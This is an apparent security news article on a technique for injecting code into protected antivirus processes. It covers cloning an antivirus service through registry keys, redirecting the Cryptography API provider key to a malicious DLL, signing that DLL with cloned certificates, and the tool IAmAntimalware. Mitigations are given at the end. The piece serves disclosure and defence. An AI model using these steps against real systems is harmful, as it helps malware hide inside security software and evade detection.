“`html
A novel strategy permits attackers to take advantage of antivirus applications by embedding harmful code straight into the antivirus operations. This tactic facilitates their ability to avoid detection and undermine the security that antivirus systems are intended to ensure.
This technique, elaborated by cybersecurity analyst Two Seven One Three on X (@TwoSevenOneT), entails replicating safeguarded services and commandeering cryptographic providers to fabricate a backdoor within the antivirus installation directory, circumventing conventional defenses.
The method underscores a flaw in how antivirus mechanisms emphasize their own stability. By injecting code into these “immortal” processes, analysts obtain elevated privileges to execute tasks like writing files to restricted folders, all while eluding detection.
As antivirus solutions advance to address more sophisticated dangers, such methods highlight the fragile equilibrium between strong security and functional stability.
Evading Antivirus Protections
Antivirus software utilizes various tactics to safeguard its core processes from disruption, guaranteeing consistent protection for users.
These applications generally operate with SYSTEM-level permissions, providing extensive access to oversee and neutralize threats throughout the system.
Process introspection allows the antivirus to meticulously inspect its own threads for irregularities, such as unauthorized code injections from outside sources.
Additional protective measures include code integrity assessments that authenticate the legitimacy of loaded modules and application of Windows’ Protected Process Light (PPL) feature.
This isolates user-mode operations, preventing tampering even by administrators. At the kernel level, antivirus drivers deploy sensors to obstruct changes to detection methodologies, while self-defense routines automatically restart affected components or notify of suspicious behavior.
Defining which processes qualify for protection is equally diligent. Developers eschew straightforward checks like process names, which malicious actors could easily mimic by duplicating filenames.
Instead, solutions like Bitdefender merge confirmation of the process’s ImagePath, ensuring the executable resides in the proper directory, with limitations on file writes to installation folders.
Digital signatures of loaded DLLs introduce another layer of security, although attackers may attempt to circumvent these through sophisticated evasion techniques.
Altering the Process Environment Block (PEB) or utilizing the CreateProcess API often proves inadequate, as kernel drivers supervise initialization from the beginning.
Service Duplication and Injection Techniques
The ingenuity of this technique lies in capitalizing on the antivirus’s dependency on operating system functionalities while exploiting less-protected auxiliary components.
Contemporary antivirus suites gather additional features like firewalls, VPNs, and user interfaces, each executing protected processes with installation folder write permissions. As direct termination or suspension of these is obstructed short of kernel exploits or tools like EDR-Freeze, analysts resort to cloning.
By manually exporting and importing registry keys for an antivirus service, such as Bitdefender’s BDProtSrv, a duplicated service can be produced with identical settings.
A system restart loads this duplicate into Services.exe’s cache, producing a new secured process. Verification with Process Explorer confirms protection through “access denied” errors when attempting termination.
Injection transpires by commandeering the Windows Cryptography API, which antivirus processes employ for encryption and signing. Altering the registry key HKLMSOFTWAREMicrosoftCryptographyDefaultsProvider to redirect to a nefarious DLL triggers loading during service startup.
To evade signature validations, the DLL is authenticated using duplicated certificates from legitimate Windows applications, a method disclosed in SpecterOps research.
Procedures encompass establishing the cloned service, altering the provider, trusting the signature, initiating the service, validating execution, and reverting the registry to prevent instability.
To automate this process, Two Seven One Three developed IAmAntimalware, an open-source utility accessible on GitHub. It clones services, adjusts cryptographic providers or COM objects, imports certificates, and initiates the duplication, all with command-line options specifying the original service, clone name, certificate file, and DLL path.
In trials with Bitdefender, the tool signed a sample DLL utilizing CertClone, another GitHub utility that replicates signatures. The DLL, which produces debug strings and writes a “mark.txt” file to the installation folder, was successfully embedded after execution.
Comparable outcomes were observed with Trend Micro and Avast, although Avast necessitated modifications to target its GUI process for dependability. The ramifications of this method are significant: malware could plant backdoors within antivirus frameworks, executing undetected.
Prevention requires meticulous surveillance of module loads from unusual paths, auditing trusted certificates in the registry, and enforcing PPL alongside behavioral analytics.
As penetration testing advances, such revelations compel antivirus vendors to strengthen defenses against their own strengths transforming into vulnerabilities.
“`